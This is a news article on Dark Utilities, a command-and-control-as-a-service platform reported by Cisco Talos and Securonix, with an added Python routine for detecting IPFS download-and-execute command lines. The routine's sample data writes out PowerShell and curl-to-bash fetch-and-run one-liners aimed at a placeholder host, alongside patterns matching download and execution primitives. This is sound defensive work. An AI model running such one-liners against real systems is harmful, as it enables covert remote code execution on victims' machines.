Cisco Talos security researchers discovered a new tool called Dark Utilities that offers command-and-control (C2) infrastructure as a service (C2aaS) to hackers looking for a quick and easy way to support their malicious operations.
Dark Utilities was released in early 2022 and currently has around 3,000 registered users, according to the latest data from security analytics and operations management company Securonix. The tool provides services for remote access, command execution, distributed denial of service (DDoS) attacks, and cryptocurrency mining operations.
Securonix described Dark Utilities as “a C2 platform that makes all functions available to attackers”. It provides payloads for Windows, Linux, macOS, Android, and Python-based implementations.
Dark Utilities is the brainchild of a relatively unknown cybercrime actor who goes by the nickname Inplex-sys. Cisco Talos assessed them as French speakers who also converse in English. Inplex-sys limited its activities to Telegram and Discord prior to the release of Dark Utilities.
Inplex-sys may have ties to the Lapsus$ cyber extortion group, which has preyed on Samsung, NVIDIA, Ubisoft, Okta, Globant, and others. Talos discovered an inplex-sys entry on Doxbin, a doxing site once owned and managed by a now-arrested 16-year-old Lapsus$ member. Inplex-sys’s records on Doxbin led Talos to believe they were in either Germany or France.
Dark Utilities uses the InterPlanetary File System (IPFS) instead of HTTP/HTTPS for peer-to-peer file sharing, which makes takedown by law enforcement, or other disruption of its hosting, considerably harder. Like the Tor2Web network, IPFS is decentralized, accessed through gateways, and does not require an application to be installed on a computer to reach content on its distribution network.
A C2 server is one of the most essential components of any hacking operation, malicious or not. As its name suggests, it serves as the central control point for targeted malware campaigns: it lets the operators communicate with the victim system, send commands and additional payloads, and store stolen data.
Dark Utilities C2aaS offers all this for as little as €9.99. Dark Utilities is hosted on both the Tor network and the open internet. “Dark Utilities’ dirt cheap subscription plan would encourage more amateurs and script kiddies to sign up for the service and launch attacks without having sufficient cyberattack knowledge,” said researchers at K7 Security.
“For example, anyone can use the RaaS revenue model to figure out how remote attacks would multiply with the adoption of C2aaS. The RaaS services usually appoint partners and offer a ransom cut. However, C2aaS would allow anyone to launch cyberattacks on any system without the required knowledge or resources.”
Users authenticate via Discord. Once authenticated, they are redirected to a dashboard where they are prompted to generate payloads specific to the operating system of the machine they want to target, and to deploy those payloads through the same dashboard.
“Choosing an operating system causes the platform to generate a command string that attackers typically embed in PowerShell or Bash scripts to make it easier to retrieve and run the payload on victim machines. An example of a payload targeting the Windows operating system is shown below,” Talos explained.
Besides the usual operating systems, Dark Utilities also supports payload creation for FiveM and for the ARM64 and ARMV71 architectures, in order to target embedded internet-connected devices such as routers, phones and Internet of Things (IoT) devices.
For payload and bot management, Dark Utilities has an administration panel that lists all victim systems, so users can control their malicious operations from one place. The dashboard also provides insight into several operational metrics, such as server health and platform statistics.
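The fetch-and-run command strings described above, a PowerShell or Bash one-liner that retrieves a payload and executes it, are a natural detection point for defenders, because the combination of a download primitive, an execution primitive and a remote content reference is rare in legitimate process-creation telemetry. The following is an added example, not code from Talos, Securonix or the Dark Utilities project, of a small triage routine over process command lines. It assumes that process-creation events (for instance Sysmon event ID 1 or auditd execve records) have already been reduced to a plain command-line string, and that payloads are retrieved through an IPFS HTTP gateway path (`/ipfs/<CID>`) or an `ipfs://` URI; the gateway hostname, the CID and the sample command lines are all constructed for illustration.

```python
"""Triage process command lines for IPFS download-and-execute one-liners.

Added example (not Talos's, Securonix's or Dark Utilities' code). Assumes
process-creation telemetry has been reduced to a command-line string and
that payloads are fetched via an IPFS gateway path or ipfs:// URI. The
hostname, CID and sample command lines below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# CIDv0 is base58btc, 46 chars starting with "Qm"; CIDv1 is commonly
# base32 starting with "baf". Case-sensitive on purpose: base58 excludes
# 0, O, I and l, so a case-insensitive match would weaken the check.
IPFS_PATH = re.compile(
    r"(?:/ipfs/|ipfs://)(Qm[1-9A-HJ-NP-Za-km-z]{44}|baf[a-z2-7]{50,})"
)

# Ways a one-liner pulls remote content (Windows and Unix-like).
DOWNLOAD = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
    r"DownloadString|DownloadFile|Net\.WebClient)\b",
    re.I,
)

# Ways fetched content is handed straight to an interpreter.
EXECUTE = re.compile(
    r"(\bIEX\b|Invoke-Expression|\|\s*(?:ba)?sh\b|chmod\s+\+x|"
    r"Start-Process|\bexec\b)",
    re.I,
)


@dataclass
class Verdict:
    cid: Optional[str]
    download: bool
    execute: bool
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Only the full chain (remote IPFS content, fetched, then executed)
        # is flagged; a plain download from IPFS is not evidence on its own.
        return self.cid is not None and self.download and self.execute


def assess(cmdline: str) -> Verdict:
    """Score one command line and record which indicators fired."""
    verdict = Verdict(cid=None, download=False, execute=False)
    m = IPFS_PATH.search(cmdline)
    if m:
        verdict.cid = m.group(1)
        verdict.reasons.append(f"references IPFS content {verdict.cid[:12]}...")
    d = DOWNLOAD.search(cmdline)
    if d:
        verdict.download = True
        verdict.reasons.append(f"download primitive: {d.group(1)}")
    e = EXECUTE.search(cmdline)
    if e:
        verdict.execute = True
        verdict.reasons.append(f"execution primitive: {e.group(0).strip()}")
    return verdict


def triage(cmdlines):
    """Assess a batch of command lines; returns (line, Verdict) pairs."""
    return [(line, assess(line)) for line in cmdlines]


# Constructed test data: hostname and CID are not real indicators.
GATEWAY = "https://ipfs-gateway.example"
CONSTRUCTED_CID = "Qm" + "DemoCid" + "X" * 37  # 46 chars, valid base58 shape

SAMPLE_COMMAND_LINES = [
    # Windows: fetch from a gateway and run in memory (suspicious)
    f"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    f".DownloadString('{GATEWAY}/ipfs/{CONSTRUCTED_CID}')\"",
    # Linux: pipe fetched content straight into a shell (suspicious)
    f'bash -c "curl -fsSL {GATEWAY}/ipfs/{CONSTRUCTED_CID} | bash"',
    # Benign: download a document from IPFS without executing it
    f"curl -o report.pdf {GATEWAY}/ipfs/{CONSTRUCTED_CID}",
    # Benign: ordinary PowerShell pipeline with no remote content
    'powershell -c "Get-Process | Sort-Object CPU -Descending"',
]


if __name__ == "__main__":
    for line, verdict in triage(SAMPLE_COMMAND_LINES):
        tag = "SUSPICIOUS" if verdict.suspicious else "ok"
        print(f"[{tag}] {line}")
        for reason in verdict.reasons:
            print(f"    - {reason}")
```

The three indicators are kept separate on purpose: a download from an IPFS gateway alone is normal for developers and researchers, and a `| bash` pipeline alone is everywhere in build scripts, so alerting on either in isolation produces noise, while requiring all three keeps the rule tight without depending on any particular gateway hostname or CID.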
Dark Utilities C2aaS dashboard | Source: Cisco Talos
Dark Utilities’ 71 Indicators of Compromise (IOCs) are available on the Securonix website.